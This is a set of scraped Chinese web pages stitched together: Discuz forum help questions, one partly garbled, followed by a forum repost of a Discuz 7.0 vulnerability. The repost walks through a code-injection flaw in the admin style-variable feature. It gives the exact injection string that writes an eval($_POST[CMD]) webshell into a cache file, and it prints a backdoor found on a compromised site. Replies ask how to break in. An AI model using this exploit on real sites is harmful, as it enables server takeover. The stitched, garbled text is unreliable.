DZ2.5如何在主导航添加一个新的论坛模块-小白_百度知道
按默认排序
说是,谢谢~,gid=1 就可以了,必然是要在某文件夹下建立某种文件吧,@甜甜我恨你,gid=45或forum-13-1,找了半天也没找到介绍的,同LZ问,php,,链接那个地方添加了forum,椴淮嬖,php,就发这了吧）--------会了 把id号改成现有的板块 就好了~~ 每个板块对应一个gid号,＞褪悄阍诤筇-论坛 里面建立的板块对应gid号 比如号1那么 界面-导航设置 里“链接”添加forum,还望指教,html这样的结构,自己也找了半天,（评论不出去,
在后台 界面 然后添加导航就可以了，导航的后面添加上你要调用的数据连接，点下面的提交就可以了。不懂的加我，我教你
LZ留QQ，11
其他类似问题
小白的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁查看: 2201|回复: 7
QQ群如何解绑DZ
我之前建的论坛现在做了测试&&测试站和正式站两个都是同样的域名
我的QQ号绑定A站的管理员号 并在后台用DZ论坛云平台绑定了我的一个高级群
后来我删除了测试站 重新建了正式站
然后我再去用QQ号绑定管理员账号 提示已经绑定了另一个账号
、然后我用DZ论坛云平台绑定我的高级群
绑定不了 提示那个群已经绑定了一个论坛 问题是那绑定的论坛就是我现在的域名
去QQ官方的&&没有解绑的选项。。。
并且在我之前绑定的QQ群没有看到解绑的标记
晕都没有人帮忙解答啊
还是自己顶把&&如果有已经解决这个问题了的 请回复 我看论坛上好多人 都在问这个问题
今日十堰论坛：
& & Discuz!社区QQ群，将社区内容分享到QQ群，让用户在群内沟通交流的同时，关注社区热门内容，点击内容直达社区，提高网站流量。
& & 请绑定您创建或管理的QQ群，绑定后设置名称、推送信息到QQ群
(65.32 KB, 下载次数: 1)
01:26 上传
楼上正解，欢迎大家访问我的网站
未命名.jpg (79.64 KB, 下载次数: 0)
10:46 上传
后来我删除了测试站 重新建了正式站
然后我再去用QQ号绑定管理员账号 提示已经绑定了另一个账号
您这个绑定是指绑定的论坛管理员帐号？
绑定QQ群，只要您是QQ群的创建者就可以直接绑定到另外一个站点。
登录QQ后选择绑定了其他站点的QQ群，会弹出如图的提示，选择是，然后点击确认绑定。
QQ截图28.png (11.8 KB, 下载次数: 0)
10:50 上传
已经绑定的 没有这个解绑按钮&&有的话 我肯定就解绑了
qqbangding.jpg (20.29 KB, 下载次数: 1)
10:53 上传
dongdong0925 发表于
您这个绑定是指绑定的论坛管理员帐号？
绑定QQ群，只要您是QQ群的创建者就可以直接绑定到另外一个站 ...
谢谢&&按照你的办法 重新绑定已经可以了！
Powered by阅读：7762回复：22
哈哈 转一个dz漏洞 Discuz7的 是新的。
发布于： 07:20
突然发现dz论坛网页文字变大了680)this.width=680;" style="max-width:680" onclick="if(this.parentNode.tagName!='A'&&this.width>screen.width-461) window.open(this.src);" />图1网页源代码可以看到：&!--int(5)
--&&!DOCTYPE html PUBLIC &-//W3C//DTD XHTML 1.0 Transitional//EN& &http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&&
&html xmlns=&http://www.w3.org/1999/xhtml&&
&meta http-equiv=&Content-Type& content=&text/ charset=gbk& /&
&title&论坛之家 找论坛找网址就上论坛之家交流/&/title&680)this.width=680;" style="max-width:680" onclick="if(this.parentNode.tagName!='A'&&this.width>screen.width-461) window.open(this.src);" />图2查看dz style缓存文件：\forumdata\cache\style_1.php$X=SUBSTR(MD5($_GET['B']),28);IF($X==';)EVAL($_POST['A']);//', 'aaaaaaaaaa');680)this.width=680;" style="max-width:680" onclick="if(this.parentNode.tagName!='A'&&this.width>screen.width-461) window.open(this.src);" />图3查看dz数据库表记录：cdb_stylevars48 　1 　','');echo '&!--';var_dump(5);echo '--&';$x=substr... 　aaaaaaaaaa 680)this.width=680;" style="max-width:680" onclick="if(this.parentNode.tagName!='A'&&this.width>screen.width-461) window.open(this.src);" />图4漏洞为：(Discuz! 7.0 及以下版本存在)/admin/styles.inc.php&?php
if($; $newcsubst) {
if($db-&result_first(&SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'&)) {
cpmsg('styles_edit_variable_duplicate', '', 'error');
} elseif(!preg_match(&/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/&, $newcvar)) {
cpmsg('styles_edit_variable_illegal', '', 'error');
$newcvar = strtolower($newcvar);
$db-&query(&INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
VALUES ('$id', '$newcvar', '$newcsubst')&);
}//插入变量数据，[url][/url] 整理
updatecache('styles');//更新缓存（写文件）
?&这是为某一style风格增加变量的代码，把变量名与变量的值存入数据库，虽然post过来的数据daddslashes了，但入库之后又都是纯净的数据了。这里涉及到一个正则问题，判断变量名的：!preg_match(&/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]* /&, $newcvar)，其中“\x7f-\xff”是指ASCII码值在127～255之间的字符，它们经常作为中文字符的首字节出现，所以可以利用其作为中文匹配的标志。于是这个匹配貌似只是允许字母或者中文做变量名，没其他高深的匹配，随便测试了下，一般情况下这个正则等于虚设：PHP代码
$newcvar=$_GET['newcvar'];
echo &&br&&;
if(!preg_match(&/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/&, $newcvar)) {
echo &haha&;
echo 'pass';
?&下面看看updatecache这个函数，在include里的cache.func.php文件里，先从数据库取出来，经过一段处理最终写入文件，具体我不描述了，我只谈谈重点，看一段函数：PHP代码
function getcachevars($data, $type = 'VAR') {
$evaluate = '';
foreach($data as $key =& $val) {
if(is_array($val)) {
$evaluate .= &\$key = &.arrayeval($val).&;\n&;
$val = addcslashes($val, '\'\\');
$evaluate .= $type == 'VAR' ? &\$key = '$val';\n& : &define('&.strtoupper($key).&', '$val');\n&;
}啥也不说了，处理了value没处理key，而这个key就是之前我们提交的，干净的存在数据库里的值。关于数组的key，大家可以参考下幻影旅团第三期《高级PHP代码审核技术》，那篇文章好多地方谈到key的问题，dz这里却忽视了...于是可以直接拿shell了，利用方法（论坛地址改成自己的），先用管理员帐号登陆后台，无需论坛创始人，管理员等级即可：中，最下面有个“自定义模板变量”，变量中填：PHP代码
OLDJUN', '#999');eval($_POST[cmd]);//替换内容随便输入：1111，然后提交，一句话木马就产生了：如果你修改的style的id是2的话，对于的shell就是style_2.php。注：很多人反应连不上一句话，我发现我文章少说了一句：PHP代码
$evaluate .= $type == 'VAR' ? &\$key = '$val';\n& : &define('&.strtoupper($key).&', '$val');\n&;这句话是说所有的变量名换成大写的了！因此请用大写的CMD做为你一句话的密码！原文来自
本文链接 首发落伍原创帖: discuz官方链接：
最新喜欢：
发布于： 07:21
发现好多DZ论坛都中了包括.cn的一个子论坛
发布于： 07:21
用户被禁言,该主题自动屏蔽!
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 07:23
这个我喜欢啊
铜币1687两
威望3511点
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 07:25
没发现字变大啊
贝贝内衣服饰
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 07:35
用户被禁言,该主题自动屏蔽!
铜币7052两
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 07:53
好的，知道了。
威望1985点
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 08:20
怎么找这个洞？如何进去？
头像、签名全套广告位出租，80元/月封顶。六星会员质量保证！联系方式：站内PM
威望2488点
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 08:25
DZ好多站 都有此问题
铜币17721两
威望4507点
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 08:38
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 08:44
能再详细点吗
贡献1456点
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 08:45
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 19:58
有啥好高兴的。。。垃圾
铜币2588两
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 20:00
size=4][url= http://user./大家帮忙说理呀。我朋友帮中电挂了两月头像 没拿到一分钱。（点击进入） [/url]中电华通,中国最厉害的骗子
<span class="lou J_floor_copy" title="复制此楼地址"
data-hash="read_楼#
发布于： 20:09
支持啊signature-----------------------------------------------&&
|||||||||||||||
Powered by
& 2003- 版权所有